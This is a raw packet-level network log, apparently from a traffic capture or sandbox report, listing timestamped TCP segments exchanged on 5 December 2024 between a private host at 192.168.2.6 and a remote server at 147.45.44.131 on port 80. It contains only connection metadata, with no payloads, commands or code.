Dec 5, 2024 11:40:01.275090933 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.275130033 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.277008057 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.277023077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.277055025 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.279000998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.279014111 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.279043913 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.280921936 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.280935049 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.280946016 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.280965090 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.280992985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.282856941 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.282871008 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.282915115 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.285178900 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.285192966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.285253048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.286936998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.286951065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.286998034 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.288788080 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.288800955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.288844109 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.290636063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.290653944 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.290667057 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.290697098 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.292599916 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.292613983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.292645931 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.294593096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.294606924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.294651985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.296468973 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.296489000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.296524048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.298460007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.298474073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.298487902 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.298501015 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.298521042 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.300466061 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.300488949 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.300539017 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.302355051 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.302369118 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.302414894 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.304346085 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.304374933 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.304430008 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.306322098 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.306351900 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.306396008 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.308223963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.308238983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.308249950 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.308286905 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.310199976 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.310214043 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.310245037 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.350296021 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.411549091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.413570881 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.413610935 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.413625002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.413628101 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.413667917 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.415568113 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.415611982 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.415659904 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.417170048 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.417184114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.417233944 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.419074059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.419089079 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.419147968 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.421031952 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.421046019 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.421057940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.421112061 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.422971010 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.422985077 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.423022985 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.424928904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.424942970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.424983978 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.426886082 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.426904917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.426939011 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.428841114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.428855896 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.428889990 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.430752039 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.430773020 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.430787086 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.430819988 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.430833101 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.432737112 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.432756901 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.432817936 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.434659958 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.434674025 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.434717894 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.436625004 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.436640978 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.436695099 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.438569069 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.438597918 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.438641071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.440541983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.440557003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.440568924 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.440629005 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.442498922 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.442512989 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.442550898 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.444427967 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.444442034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.444487095 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.446434975 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.446449041 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.446480036 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.448333025 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.448354959 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.448368073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.448383093 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.448405027 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.450304031 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.450319052 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.450393915 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.452418089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.452438116 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.452503920 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.454224110 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.454237938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.454282999 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.456443071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.456456900 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.456506968 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.458563089 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.458578110 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.458590031 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.458622932 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.461077929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.461092949 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.461127043 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.463119030 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.463133097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.463171005 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.465233088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.465248108 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.465289116 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.467276096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.467288971 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.467299938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.467366934 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.469173908 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.469194889 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.469275951 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.470824957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.470854044 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.470896006 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.472387075 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.472402096 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.472445965 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.473973989 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.473989010 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.474034071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.475656033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.475670099 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.475682020 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.475742102 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.477587938 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.477611065 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.477643013 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.479537964 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.479556084 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.479597092 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.481501102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.481523037 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.481712103 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.483453035 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.483467102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.483479023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.483517885 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.483541012 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.485379934 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.485407114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.485451937 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.487355947 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.487370968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.487417936 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.489273071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.489299059 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.489341021 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.491244078 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.491281033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.491456032 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.493175983 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.493226051 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.493314028 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.495228052 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.495243073 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.495254040 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.495296955 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.497065067 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.497087002 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.497117996 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.499083996 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.499099970 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.499160051 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.501003981 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.501019001 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.501051903 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.502943993 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.502979040 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.502994061 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.502995014 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.503030062 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.504853964 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.553422928 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.601898909 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.602343082 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.602412939 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.603230000 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.604098082 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.604149103 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.605123043 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.605135918 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.605192900 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.606719971 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.607306957 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.607356071 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.608264923 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.608285904 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.608330965 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.610172987 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.611092091 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.611104012 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.611140966 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.612988949 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.613002062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.613033056 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.614383936 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.614398003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.614434004 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.616152048 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.616166115 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.616211891 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.618170023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.618182898 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.618213892 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.620115042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.620130062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.620168924 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.622061968 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.622081041 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.622113943 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.624089956 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.624104023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.624116898 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.624136925 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.624174118 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.625865936 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.625880003 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.625919104 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.627840042 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.627852917 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.627891064 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.629782915 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.629797935 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.629848957 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.631726980 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.631741047 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.631788015 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.633630037 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.633644104 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.633655071 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.633691072 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.635580063 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.635593891 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.635623932 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.637521982 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.637540102 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.637588978 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.639496088 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.639518023 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.639542103 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.641411066 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.641423941 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.641438007 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.641468048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.641499043 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.643269062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.643326998 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.643368006 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.645339966 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.645354033 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.645399094 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.647166014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.647181034 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.647233009 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.649053097 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.649075985 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.649116993 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.650989056 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.651009083 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.651021004 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.651071072 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.652956963 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.652971029 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.653002024 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.654859066 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.654881001 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.654911041 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.656837940 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.656857014 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.656882048 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.658833981 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.658849955 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.658862114 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.658890963 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.658911943 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.660772085 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.660785913 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.660837889 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.662622929 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.662636995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.662681103 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.664602995 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.664617062 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.664666891 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.666450024 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.666493893 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.666538000 CET	49708	80	192.168.2.6	147.45.44.131
Dec 5, 2024 11:40:01.668567896 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.668581009 CET	80	49708	147.45.44.131	192.168.2.6
Dec 5, 2024 11:40:01.668628931 CET	49708	80	192.168.2.6	147.45.44.131
